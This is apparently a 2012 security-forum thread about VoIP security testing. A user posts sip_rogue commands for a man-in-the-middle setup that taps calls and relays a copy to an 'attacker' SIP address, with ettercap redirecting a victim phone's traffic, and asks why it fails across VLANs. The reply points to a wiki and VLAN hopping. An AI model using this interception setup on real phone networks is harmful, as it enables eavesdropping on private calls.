voip testing need help unable to intercept calls?
Posted 13 January 2012 - 01:15 PM
telnet localhost 6060
create sipudpport port
create sipdispatcher disp
create sipregistrarconnector reg to 10.1.101.2:5060 with the domain
create rtphandler rtp
create sipendpoint hacker
issue hacker accept calls
issue hacker relay calls to sip:email@example.com
issue hacker tap calls to sip:firstname.lastname@example.org (the attacker)
In the original attack mentioned in hacking exposed VOIP: voice over IP security secret and solution. The victim and the attacker in on the same vlan as proxy server but in my case its different VLAN. As i pick the fone (ext 4000) to listen on the conversation i just get the dial tone. I'm using ettercap to direct the traffic from the victim ip phone to bt4 machine running sip_rogue application.
I hope i can be helped with. Thanks
Posted 26 February 2012 - 07:05 AM
I find the BT VoIP wiki to be a better resource. This particular resource is still a little out of date, but will give you a good head start; and make sure to take a good look at the VLAN hopping section.
I have been working on some demos with VoIP and security testing a network which has it, and been up all night setting up my VM to give an talk at a local security group this Monday. Now it has been a little over 2 years since I have really done anything with VoIP (since I became a sophomore in university) and am amazed at how far VoIP security testing has came. I will write a how to when I can (been falling behind in school because of work), but that link should give you a head start in the right direction.
Hope that helps and good luck on your report.
BinRev is hosted by the great people at Lunarpages!